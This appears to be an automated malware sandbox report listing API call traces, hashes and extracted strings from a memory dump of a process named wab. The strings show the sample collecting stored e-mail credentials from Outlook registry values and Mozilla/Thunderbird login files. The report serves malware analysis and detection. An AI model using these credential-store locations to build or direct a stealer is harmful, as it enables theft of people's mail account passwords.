                                                                                  • CloseHandle.KERNEL32(?), ref: 00406E80
                                                                                  • GetLastError.KERNEL32 ref: 00406E8B
                                                                                  • CloseClipboard.USER32 ref: 00406E94
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                  • String ID:
                                                                                  • API String ID: 2565263379-0
                                                                                  • Opcode ID: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                  • Instruction ID: a08a85c5be877f1b118c2cb4fdaf5607b5944e2b5e0e57495ee86e8d77b21b2f
                                                                                  • Opcode Fuzzy Hash: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                  • Instruction Fuzzy Hash: A9114F39501205EFE7506FB4EC8CB9E7BB8EF05315F144175F506E22A1DB3489158AA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfileString_mbscmpstrlen
                                                                                  • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                  • API String ID: 3963849919-1658304561
                                                                                  • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                  • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                  • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                  • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??2@??3@memcpymemset
                                                                                  • String ID: (yE$(yE$(yE
                                                                                  • API String ID: 1865533344-362086290
                                                                                  • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                  • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                  • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                  • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • strlen.MSVCRT ref: 004431AD
                                                                                  • _strncoll.MSVCRT ref: 004431BD
                                                                                  • memcpy.MSVCRT ref: 00443239
                                                                                  • atoi.MSVCRT ref: 0044324A
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00443276
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide_strncollatoimemcpystrlen
                                                                                  • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                  • API String ID: 1864335961-3210201812
                                                                                  • Opcode ID: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
                                                                                  • Instruction ID: 70136e13f872b1b8ab9f6622f700308096b0d0b5c52b82b67a7483c56e51dea4
                                                                                  • Opcode Fuzzy Hash: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
                                                                                  • Instruction Fuzzy Hash: 4AF10B718012589BDB22CF54C8487DEBBB4BB0278BF5485CAD8597B242C7B85B8DCF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strcmpi$strlen$_strncoll$atoimemcpy$memset
                                                                                  • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                                                                  • API String ID: 750245531-2206097438
                                                                                  • Opcode ID: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
                                                                                  • Instruction ID: f11149d289dc999bf060bfe26817f696df6097fe02de34603fea895fe08660a4
                                                                                  • Opcode Fuzzy Hash: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
                                                                                  • Instruction Fuzzy Hash: 11A1C932804206BAFF14ABA6DD02B9E77A4DF50328F20447FF405B71D1EB79AE55964C
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                  • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                  • API String ID: 1714764973-479759155
                                                                                  • Opcode ID: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                                                  • Instruction ID: 3e95309f0516475de87f4a3b36a82bfae981417ea13aa6096d07c622cb899a74
                                                                                  • Opcode Fuzzy Hash: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                                                  • Instruction Fuzzy Hash: FB91A9726087056AF224BB36DD43B9F33D8EF4071DF20042FF85AA6182EE6DBA05461D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040EBD8
                                                                                    • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                  • memset.MSVCRT ref: 0040EC2B
                                                                                  • memset.MSVCRT ref: 0040EC47
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                  • memset.MSVCRT ref: 0040ECDD
                                                                                  • memset.MSVCRT ref: 0040ECF2
                                                                                  • _mbscpy.MSVCRT ref: 0040ED59
                                                                                  • _mbscpy.MSVCRT ref: 0040ED6F
                                                                                  • _mbscpy.MSVCRT ref: 0040ED85
                                                                                  • _mbscpy.MSVCRT ref: 0040ED9B
                                                                                  • _mbscpy.MSVCRT ref: 0040EDB1
                                                                                  • _mbscpy.MSVCRT ref: 0040EDC7
                                                                                  • memset.MSVCRT ref: 0040EDE1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                  • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                  • API String ID: 3137614212-1455797042
                                                                                  • Opcode ID: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                  • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                                  • Opcode Fuzzy Hash: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                  • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                    • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                    • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                    • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                  • memset.MSVCRT ref: 0040E5B8
                                                                                  • memset.MSVCRT ref: 0040E5CD
                                                                                  • _mbscpy.MSVCRT ref: 0040E634
                                                                                  • _mbscpy.MSVCRT ref: 0040E64A
                                                                                  • _mbscpy.MSVCRT ref: 0040E660
                                                                                  • _mbscpy.MSVCRT ref: 0040E676
                                                                                  • _mbscpy.MSVCRT ref: 0040E68C
                                                                                  • _mbscpy.MSVCRT ref: 0040E69F
                                                                                  • memset.MSVCRT ref: 0040E6B5
                                                                                  • memset.MSVCRT ref: 0040E6CC
                                                                                    • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                    • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                                                                                  • memset.MSVCRT ref: 0040E736
                                                                                  • memset.MSVCRT ref: 0040E74F
                                                                                  • sprintf.MSVCRT ref: 0040E76D
                                                                                  • sprintf.MSVCRT ref: 0040E788
                                                                                  • _strcmpi.MSVCRT ref: 0040E79E
                                                                                  • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                  • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                  • memset.MSVCRT ref: 0040E858
                                                                                  • sprintf.MSVCRT ref: 0040E873
                                                                                  • _strcmpi.MSVCRT ref: 0040E889
                                                                                  • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                  • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                  • API String ID: 4171719235-3943159138
                                                                                  • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                  • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                  • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                  • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                  • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                  • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                  • GetDC.USER32 ref: 004104E2
                                                                                  • strlen.MSVCRT ref: 00410522
                                                                                  • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                  • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                  • sprintf.MSVCRT ref: 00410640
                                                                                  • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                  • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                  • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                  • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                  • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                  • GetClientRect.USER32(?,?), ref: 00410737
                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                  • String ID: %s:$EDIT$STATIC
                                                                                  • API String ID: 1703216249-3046471546
                                                                                  • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                  • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                  • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                  • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 004024F5
                                                                                    • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                  • _mbscpy.MSVCRT ref: 00402533
                                                                                  • _mbscpy.MSVCRT ref: 004025FD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _mbscpy$QueryValuememset
                                                                                  • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                  • API String ID: 168965057-606283353
                                                                                  • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                  • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                  • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                  • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00402869
                                                                                    • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                  • _mbscpy.MSVCRT ref: 004028A3
                                                                                    • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                  • _mbscpy.MSVCRT ref: 0040297B
                                                                                    • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                  • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                  • API String ID: 1497257669-167382505
                                                                                  • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                  • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                  • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                  • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                  • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                  • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                  • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                  • memset.MSVCRT ref: 0040FCFD
                                                                                  • memset.MSVCRT ref: 0040FD1D
                                                                                  • memset.MSVCRT ref: 0040FD3B
                                                                                  • memset.MSVCRT ref: 0040FD54
                                                                                  • memset.MSVCRT ref: 0040FD72
                                                                                  • memset.MSVCRT ref: 0040FD8B
                                                                                  • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                  • memset.MSVCRT ref: 0040FE45
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                  • memcpy.MSVCRT ref: 0040FE82
                                                                                  • _mbscpy.MSVCRT ref: 0040FEA4
                                                                                  • sprintf.MSVCRT ref: 0040FF0F
                                                                                  • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                  • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                  Strings
                                                                                  • {Unknown}, xrefs: 0040FD02
                                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                  • API String ID: 1428123949-3474136107
                                                                                  • Opcode ID: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                                                  • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                                                                                  • Opcode Fuzzy Hash: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                                                  • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                  • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                  • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                  • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                  • DeleteObject.GDI32(?), ref: 00401226
                                                                                  • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                  • ShowWindow.USER32(00000000), ref: 00401253
                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                  • ShowWindow.USER32(00000000), ref: 00401262
                                                                                  • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                  • memset.MSVCRT ref: 0040128E
                                                                                  • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                  • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                  • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                  • String ID:
                                                                                  • API String ID: 2998058495-0
                                                                                  • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                  • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                  • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                  • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                                    • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                                                  • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                                                  • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                                                  • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                                                  • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                                                  • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                                                  • _strcmpi.MSVCRT ref: 0040BE93
                                                                                  • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                                                  • SetFocus.USER32(?,00000000), ref: 0040BECE
                                                                                  • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                                                  • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                                                  • strlen.MSVCRT ref: 0040BEFE
                                                                                  • strlen.MSVCRT ref: 0040BF0C
                                                                                  • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                                    • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                                    • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                                                  • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                                                  • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                                                  • memset.MSVCRT ref: 0040BFDB
                                                                                  • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                  • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                  • API String ID: 2303586283-933021314
                                                                                  • Opcode ID: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                                                  • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                                                                  • Opcode Fuzzy Hash: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                                                  • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcmp$memcpy
